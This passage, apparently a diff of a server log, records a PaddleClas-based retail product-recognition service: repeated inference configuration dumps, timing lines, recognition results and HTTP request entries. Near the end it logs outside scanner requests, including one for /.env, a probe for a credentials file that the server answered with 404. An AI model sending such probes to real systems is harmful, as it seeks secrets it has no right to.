/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:11:17 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:11:17 INFO: threshold : 0.2 +2022-02-14 09:11:17 INFO: use_fp16 : False +2022-02-14 09:11:17 INFO: use_gpu : False +2022-02-14 09:11:17 INFO: use_tensorrt : False +2022-02-14 09:11:17 INFO: IndexProcess : +2022-02-14 09:11:17 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:11:17 INFO: return_k : 5 +2022-02-14 09:11:17 INFO: score_thres : 0.5 +2022-02-14 09:11:17 INFO: RecPostProcess : None +2022-02-14 09:11:17 INFO: RecPreProcess : +2022-02-14 09:11:17 INFO: transform_ops : +2022-02-14 09:11:17 INFO: ResizeImage : +2022-02-14 09:11:17 INFO: size : 224 +2022-02-14 09:11:17 INFO: NormalizeImage : +2022-02-14 09:11:17 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:17 INFO: order : +2022-02-14 09:11:17 INFO: scale : 0.00392157 +2022-02-14 09:11:17 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:17 INFO: ToCHWImage : None +Inference: 373.11553955078125 ms per batch image +[] 234 -["{'bbox': [56, 54, 467, 479], 'rec_docs': '江小白', 'rec_scores': 0.655632}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 38/102] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 09:14:01 2021] POST /reference_client/ => generated 114 bytes in 10161 msecs (HTTP/1.1 200) 5 headers in 158 bytes (22 switches on core 0) -[pid: 32765|app: 0|req: 56/103] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 09:25:17 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 39/104] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 09:25:18 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 57/105] 210.51.42.187 () {40 vars in 690 bytes} [Wed Nov 3 09:30:50 2021] GET /favicon.ico => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 
158 bytes (1 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1145/1347] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 09:11:16 2022] POST /reference_client/ => generated 98 bytes in 3011 msecs (HTTP/1.1 200) 5 headers in 157 bytes (29 switches on core 0) +req +2022-02-14 09:11:33 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:11:33 INFO: DetPostProcess : +2022-02-14 09:11:33 INFO: DetPreProcess : +2022-02-14 09:11:33 INFO: transform_ops : +2022-02-14 09:11:33 INFO: DetResize : +2022-02-14 09:11:33 INFO: interp : 2 +2022-02-14 09:11:33 INFO: keep_ratio : False +2022-02-14 09:11:33 INFO: target_size : [640, 640] +2022-02-14 09:11:33 INFO: DetNormalizeImage : +2022-02-14 09:11:33 INFO: is_scale : True +2022-02-14 09:11:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:33 INFO: DetPermute : +2022-02-14 09:11:33 INFO: Global : +2022-02-14 09:11:33 INFO: batch_size : 1 +2022-02-14 09:11:33 INFO: cpu_num_threads : 1 +2022-02-14 09:11:33 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:11:33 INFO: enable_benchmark : True +2022-02-14 09:11:33 INFO: enable_mkldnn : True +2022-02-14 09:11:33 INFO: enable_profile : False +2022-02-14 09:11:33 INFO: gpu_mem : 8000 +2022-02-14 09:11:33 INFO: image_shape : [3, 640, 640] +2022-02-14 09:11:33 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:11:33 INFO: ir_optim : True +2022-02-14 09:11:33 INFO: labe_list : ['foreground'] +2022-02-14 09:11:33 
INFO: max_det_results : 5 +2022-02-14 09:11:33 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:11:33 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:11:33 INFO: threshold : 0.2 +2022-02-14 09:11:33 INFO: use_fp16 : False +2022-02-14 09:11:33 INFO: use_gpu : False +2022-02-14 09:11:33 INFO: use_tensorrt : False +2022-02-14 09:11:33 INFO: IndexProcess : +2022-02-14 09:11:33 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:11:33 INFO: return_k : 5 +2022-02-14 09:11:33 INFO: score_thres : 0.5 +2022-02-14 09:11:33 INFO: RecPostProcess : None +2022-02-14 09:11:33 INFO: RecPreProcess : +2022-02-14 09:11:33 INFO: transform_ops : +2022-02-14 09:11:33 INFO: ResizeImage : +2022-02-14 09:11:33 INFO: size : 224 +2022-02-14 09:11:33 INFO: NormalizeImage : +2022-02-14 09:11:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:33 INFO: order : +2022-02-14 09:11:33 INFO: scale : 0.00392157 +2022-02-14 09:11:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:33 INFO: ToCHWImage : None +Inference: 381.8855285644531 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1146/1348] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 09:11:32 2022] POST /reference_client/ => generated 98 bytes in 3026 msecs (HTTP/1.1 200) 5 headers in 157 bytes (19 switches on core 0) +req +2022-02-14 09:11:40 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:11:40 INFO: DetPostProcess : +2022-02-14 09:11:40 INFO: DetPreProcess : +2022-02-14 09:11:40 INFO: transform_ops : +2022-02-14 09:11:40 INFO: DetResize : +2022-02-14 09:11:40 INFO: interp : 2 +2022-02-14 09:11:40 INFO: keep_ratio : False +2022-02-14 09:11:40 INFO: target_size : [640, 640] +2022-02-14 09:11:40 INFO: DetNormalizeImage : +2022-02-14 09:11:40 INFO: is_scale : True +2022-02-14 09:11:40 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:40 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:40 INFO: DetPermute : +2022-02-14 09:11:40 INFO: Global : +2022-02-14 09:11:40 INFO: batch_size : 1 +2022-02-14 09:11:40 INFO: cpu_num_threads : 1 +2022-02-14 09:11:40 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:11:40 INFO: enable_benchmark : True +2022-02-14 09:11:40 INFO: enable_mkldnn : True +2022-02-14 09:11:40 INFO: enable_profile : False +2022-02-14 09:11:40 INFO: gpu_mem : 8000 +2022-02-14 09:11:40 INFO: image_shape : [3, 640, 640] +2022-02-14 09:11:40 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:11:40 INFO: ir_optim : True +2022-02-14 09:11:40 INFO: labe_list : ['foreground'] +2022-02-14 09:11:40 INFO: max_det_results : 5 +2022-02-14 09:11:40 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:11:40 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:11:40 INFO: threshold : 0.2 +2022-02-14 09:11:40 INFO: use_fp16 : False +2022-02-14 09:11:40 INFO: use_gpu : False +2022-02-14 09:11:40 INFO: use_tensorrt : False +2022-02-14 09:11:40 INFO: IndexProcess : +2022-02-14 09:11:40 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:11:40 INFO: return_k : 5 +2022-02-14 
09:11:40 INFO: score_thres : 0.5 +2022-02-14 09:11:40 INFO: RecPostProcess : None +2022-02-14 09:11:40 INFO: RecPreProcess : +2022-02-14 09:11:40 INFO: transform_ops : +2022-02-14 09:11:40 INFO: ResizeImage : +2022-02-14 09:11:40 INFO: size : 224 +2022-02-14 09:11:40 INFO: NormalizeImage : +2022-02-14 09:11:40 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:40 INFO: order : +2022-02-14 09:11:40 INFO: scale : 0.00392157 +2022-02-14 09:11:40 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:40 INFO: ToCHWImage : None +Inference: 383.95237922668457 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1147/1349] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 09:11:39 2022] POST /reference_client/ => generated 98 bytes in 3023 msecs (HTTP/1.1 200) 5 headers in 157 bytes (16 switches on core 0) +req +2022-02-14 09:11:50 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:11:50 INFO: DetPostProcess : +2022-02-14 09:11:50 INFO: DetPreProcess : +2022-02-14 09:11:50 INFO: transform_ops : +2022-02-14 09:11:50 INFO: DetResize : +2022-02-14 09:11:50 INFO: interp : 2 +2022-02-14 09:11:50 INFO: keep_ratio : False +2022-02-14 09:11:50 INFO: target_size : [640, 640] +2022-02-14 09:11:50 INFO: DetNormalizeImage : +2022-02-14 09:11:50 INFO: is_scale : True +2022-02-14 09:11:50 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:50 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:50 INFO: DetPermute : +2022-02-14 09:11:50 INFO: Global : +2022-02-14 09:11:50 INFO: batch_size : 1 +2022-02-14 09:11:50 INFO: cpu_num_threads : 1 +2022-02-14 09:11:50 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:11:50 INFO: enable_benchmark : True +2022-02-14 09:11:50 INFO: enable_mkldnn : True +2022-02-14 09:11:50 INFO: enable_profile : False +2022-02-14 09:11:50 INFO: gpu_mem : 8000 +2022-02-14 09:11:50 INFO: image_shape : [3, 640, 640] +2022-02-14 09:11:50 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:11:50 INFO: ir_optim : True +2022-02-14 09:11:50 INFO: labe_list : ['foreground'] +2022-02-14 09:11:50 INFO: max_det_results : 5 +2022-02-14 09:11:50 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:11:50 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:11:50 INFO: threshold : 0.2 +2022-02-14 09:11:50 INFO: use_fp16 : False +2022-02-14 09:11:50 INFO: use_gpu : False +2022-02-14 09:11:50 INFO: use_tensorrt : False +2022-02-14 09:11:50 INFO: IndexProcess : +2022-02-14 09:11:50 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:11:50 INFO: return_k : 5 +2022-02-14 
09:11:50 INFO: score_thres : 0.5 +2022-02-14 09:11:50 INFO: RecPostProcess : None +2022-02-14 09:11:50 INFO: RecPreProcess : +2022-02-14 09:11:50 INFO: transform_ops : +2022-02-14 09:11:50 INFO: ResizeImage : +2022-02-14 09:11:50 INFO: size : 224 +2022-02-14 09:11:50 INFO: NormalizeImage : +2022-02-14 09:11:50 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:50 INFO: order : +2022-02-14 09:11:50 INFO: scale : 0.00392157 +2022-02-14 09:11:50 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:50 INFO: ToCHWImage : None +Inference: 381.49380683898926 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1148/1350] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:11:48 2022] POST /reference_client/ => generated 98 bytes in 3001 msecs (HTTP/1.1 200) 5 headers in 157 bytes (18 switches on core 0) +[pid: 19148|app: 0|req: 1149/1351] 223.167.141.7 () {36 vars in 760 bytes} [Mon Feb 14 09:13:29 2022] GET /reference_client/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1150/1352] 223.167.141.7 () {36 vars in 701 bytes} [Mon Feb 14 09:13:29 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-02-14 09:17:15 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:17:15 INFO: DetPostProcess : +2022-02-14 09:17:15 INFO: DetPreProcess : +2022-02-14 09:17:15 INFO: transform_ops : +2022-02-14 09:17:15 INFO: DetResize : +2022-02-14 09:17:15 INFO: interp : 2 +2022-02-14 09:17:15 INFO: keep_ratio : False +2022-02-14 09:17:15 INFO: target_size : [640, 640] +2022-02-14 09:17:15 INFO: DetNormalizeImage : +2022-02-14 09:17:15 INFO: is_scale : True +2022-02-14 09:17:15 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:15 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:15 INFO: DetPermute : +2022-02-14 09:17:15 INFO: Global : +2022-02-14 09:17:15 INFO: batch_size : 1 +2022-02-14 09:17:15 INFO: cpu_num_threads : 1 +2022-02-14 09:17:15 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:17:15 INFO: enable_benchmark : True +2022-02-14 09:17:15 INFO: enable_mkldnn : True +2022-02-14 09:17:15 INFO: enable_profile : False +2022-02-14 09:17:15 INFO: gpu_mem : 8000 +2022-02-14 09:17:15 INFO: image_shape : [3, 640, 640] +2022-02-14 09:17:15 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:17:15 INFO: ir_optim : True +2022-02-14 09:17:15 INFO: labe_list : ['foreground'] +2022-02-14 09:17:15 INFO: max_det_results : 5 +2022-02-14 09:17:15 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:17:15 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:17:15 INFO: threshold : 0.2 +2022-02-14 09:17:15 INFO: use_fp16 : False +2022-02-14 09:17:15 INFO: use_gpu : False +2022-02-14 09:17:15 INFO: use_tensorrt : False +2022-02-14 09:17:15 INFO: IndexProcess : +2022-02-14 09:17:15 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:17:15 INFO: return_k : 5 +2022-02-14 
09:17:15 INFO: score_thres : 0.5 +2022-02-14 09:17:15 INFO: RecPostProcess : None +2022-02-14 09:17:15 INFO: RecPreProcess : +2022-02-14 09:17:15 INFO: transform_ops : +2022-02-14 09:17:15 INFO: ResizeImage : +2022-02-14 09:17:15 INFO: size : 224 +2022-02-14 09:17:15 INFO: NormalizeImage : +2022-02-14 09:17:15 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:15 INFO: order : +2022-02-14 09:17:15 INFO: scale : 0.00392157 +2022-02-14 09:17:15 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:15 INFO: ToCHWImage : None +Inference: 379.1394233703613 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1151/1353] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:17:14 2022] POST /reference_client/ => generated 98 bytes in 3055 msecs (HTTP/1.1 200) 5 headers in 157 bytes (21 switches on core 0) +req +2022-02-14 09:17:25 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:17:25 INFO: DetPostProcess : +2022-02-14 09:17:25 INFO: DetPreProcess : +2022-02-14 09:17:25 INFO: transform_ops : +2022-02-14 09:17:25 INFO: DetResize : +2022-02-14 09:17:25 INFO: interp : 2 +2022-02-14 09:17:25 INFO: keep_ratio : False +2022-02-14 09:17:25 INFO: target_size : [640, 640] +2022-02-14 09:17:25 INFO: DetNormalizeImage : +2022-02-14 09:17:25 INFO: is_scale : True +2022-02-14 09:17:25 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:25 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:25 INFO: DetPermute : +2022-02-14 09:17:25 INFO: Global : +2022-02-14 09:17:25 INFO: batch_size : 1 +2022-02-14 09:17:25 INFO: cpu_num_threads : 1 +2022-02-14 09:17:25 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:17:25 INFO: enable_benchmark : True +2022-02-14 09:17:25 INFO: enable_mkldnn : True +2022-02-14 09:17:25 INFO: enable_profile : False +2022-02-14 09:17:25 INFO: gpu_mem : 8000 +2022-02-14 09:17:25 INFO: image_shape : [3, 640, 640] +2022-02-14 09:17:25 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:17:25 INFO: ir_optim : True +2022-02-14 09:17:25 INFO: labe_list : ['foreground'] +2022-02-14 09:17:25 INFO: max_det_results : 5 +2022-02-14 09:17:25 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:17:25 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:17:25 INFO: threshold : 0.2 +2022-02-14 09:17:25 INFO: use_fp16 : False +2022-02-14 09:17:25 INFO: use_gpu : False +2022-02-14 09:17:25 INFO: use_tensorrt : False +2022-02-14 09:17:25 INFO: IndexProcess : +2022-02-14 09:17:25 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:17:25 INFO: return_k : 5 +2022-02-14 
09:17:25 INFO: score_thres : 0.5 +2022-02-14 09:17:25 INFO: RecPostProcess : None +2022-02-14 09:17:25 INFO: RecPreProcess : +2022-02-14 09:17:25 INFO: transform_ops : +2022-02-14 09:17:25 INFO: ResizeImage : +2022-02-14 09:17:25 INFO: size : 224 +2022-02-14 09:17:25 INFO: NormalizeImage : +2022-02-14 09:17:25 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:25 INFO: order : +2022-02-14 09:17:25 INFO: scale : 0.00392157 +2022-02-14 09:17:25 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:25 INFO: ToCHWImage : None +Inference: 375.52452087402344 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1152/1354] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:17:24 2022] POST /reference_client/ => generated 98 bytes in 2924 msecs (HTTP/1.1 200) 5 headers in 157 bytes (14 switches on core 0) +req +2022-02-14 09:17:33 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:17:33 INFO: DetPostProcess : +2022-02-14 09:17:33 INFO: DetPreProcess : +2022-02-14 09:17:33 INFO: transform_ops : +2022-02-14 09:17:33 INFO: DetResize : +2022-02-14 09:17:33 INFO: interp : 2 +2022-02-14 09:17:33 INFO: keep_ratio : False +2022-02-14 09:17:33 INFO: target_size : [640, 640] +2022-02-14 09:17:33 INFO: DetNormalizeImage : +2022-02-14 09:17:33 INFO: is_scale : True +2022-02-14 09:17:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:33 INFO: DetPermute : +2022-02-14 09:17:33 INFO: Global : +2022-02-14 09:17:33 INFO: batch_size : 1 +2022-02-14 09:17:33 INFO: cpu_num_threads : 1 +2022-02-14 09:17:33 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:17:33 INFO: enable_benchmark : True +2022-02-14 09:17:33 INFO: enable_mkldnn : True +2022-02-14 09:17:33 INFO: enable_profile : False +2022-02-14 09:17:33 INFO: gpu_mem : 8000 +2022-02-14 09:17:33 INFO: image_shape : [3, 640, 640] +2022-02-14 09:17:33 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:17:33 INFO: ir_optim : True +2022-02-14 09:17:33 INFO: labe_list : ['foreground'] +2022-02-14 09:17:33 INFO: max_det_results : 5 +2022-02-14 09:17:33 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:17:33 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:17:33 INFO: threshold : 0.2 +2022-02-14 09:17:33 INFO: use_fp16 : False +2022-02-14 09:17:33 INFO: use_gpu : False +2022-02-14 09:17:33 INFO: use_tensorrt : False +2022-02-14 09:17:33 INFO: IndexProcess : +2022-02-14 09:17:33 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:17:33 INFO: return_k : 5 +2022-02-14 
09:17:33 INFO: score_thres : 0.5 +2022-02-14 09:17:33 INFO: RecPostProcess : None +2022-02-14 09:17:33 INFO: RecPreProcess : +2022-02-14 09:17:33 INFO: transform_ops : +2022-02-14 09:17:33 INFO: ResizeImage : +2022-02-14 09:17:33 INFO: size : 224 +2022-02-14 09:17:33 INFO: NormalizeImage : +2022-02-14 09:17:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:33 INFO: order : +2022-02-14 09:17:33 INFO: scale : 0.00392157 +2022-02-14 09:17:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:33 INFO: ToCHWImage : None +Inference: 373.5072612762451 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1153/1355] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:17:32 2022] POST /reference_client/ => generated 98 bytes in 2972 msecs (HTTP/1.1 200) 5 headers in 157 bytes (22 switches on core 0) +req +2022-02-14 09:17:42 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:17:42 INFO: DetPostProcess : +2022-02-14 09:17:42 INFO: DetPreProcess : +2022-02-14 09:17:42 INFO: transform_ops : +2022-02-14 09:17:42 INFO: DetResize : +2022-02-14 09:17:42 INFO: interp : 2 +2022-02-14 09:17:42 INFO: keep_ratio : False +2022-02-14 09:17:42 INFO: target_size : [640, 640] +2022-02-14 09:17:42 INFO: DetNormalizeImage : +2022-02-14 09:17:42 INFO: is_scale : True +2022-02-14 09:17:42 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:42 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:42 INFO: DetPermute : +2022-02-14 09:17:42 INFO: Global : +2022-02-14 09:17:42 INFO: batch_size : 1 +2022-02-14 09:17:42 INFO: cpu_num_threads : 1 +2022-02-14 09:17:42 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:17:42 INFO: enable_benchmark : True +2022-02-14 09:17:42 INFO: enable_mkldnn : True +2022-02-14 09:17:42 INFO: enable_profile : False +2022-02-14 09:17:42 INFO: gpu_mem : 8000 +2022-02-14 09:17:42 INFO: image_shape : [3, 640, 640] +2022-02-14 09:17:42 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:17:42 INFO: ir_optim : True +2022-02-14 09:17:42 INFO: labe_list : ['foreground'] +2022-02-14 09:17:42 INFO: max_det_results : 5 +2022-02-14 09:17:42 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:17:42 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:17:42 INFO: threshold : 0.2 +2022-02-14 09:17:42 INFO: use_fp16 : False +2022-02-14 09:17:42 INFO: use_gpu : False +2022-02-14 09:17:42 INFO: use_tensorrt : False +2022-02-14 09:17:42 INFO: IndexProcess : +2022-02-14 09:17:42 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:17:42 INFO: return_k : 5 +2022-02-14 
09:17:42 INFO: score_thres : 0.5 +2022-02-14 09:17:42 INFO: RecPostProcess : None +2022-02-14 09:17:42 INFO: RecPreProcess : +2022-02-14 09:17:42 INFO: transform_ops : +2022-02-14 09:17:42 INFO: ResizeImage : +2022-02-14 09:17:42 INFO: size : 224 +2022-02-14 09:17:42 INFO: NormalizeImage : +2022-02-14 09:17:42 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:42 INFO: order : +2022-02-14 09:17:42 INFO: scale : 0.00392157 +2022-02-14 09:17:42 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:42 INFO: ToCHWImage : None +Inference: 372.1733093261719 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1154/1356] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:17:41 2022] POST /reference_client/ => generated 98 bytes in 2873 msecs (HTTP/1.1 200) 5 headers in 157 bytes (20 switches on core 0) +[pid: 19148|app: 0|req: 1155/1357] 223.167.141.7 () {38 vars in 791 bytes} [Mon Feb 14 09:20:19 2022] GET /reference_client/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1156/1358] 164.90.197.24 () {36 vars in 481 bytes} [Mon Feb 14 10:39:03 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1157/1359] 84.22.3.25 () {32 vars in 460 bytes} [Mon Feb 14 10:52:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1158/1360] 23.251.102.74 () {34 vars in 497 bytes} [Mon Feb 14 10:55:37 2022] GET /solr/ => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1159/1361] 83.97.20.34 () {30 vars in 328 bytes} [Mon Feb 14 11:30:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1160/1362] 34.140.248.32 () {42 vars in 562 bytes} [Mon 
Feb 14 11:34:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1161/1363] 185.142.236.35 () {34 vars in 537 bytes} [Mon Feb 14 12:17:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1162/1364] 185.142.236.35 () {30 vars in 360 bytes} [Mon Feb 14 12:17:31 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1163/1365] 185.142.236.35 () {30 vars in 362 bytes} [Mon Feb 14 12:17:32 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1164/1366] 185.142.236.35 () {30 vars in 388 bytes} [Mon Feb 14 12:17:33 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1165/1367] 185.142.236.35 () {36 vars in 515 bytes} [Mon Feb 14 12:17:34 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1166/1368] 83.97.20.34 () {26 vars in 286 bytes} [Mon Feb 14 12:56:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1167/1369] 20.151.201.9 () {36 vars in 499 bytes} [Mon Feb 14 13:25:21 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1168/1370] 162.142.125.219 () {28 vars in 312 bytes} [Mon Feb 14 13:43:50 2022] GET / => 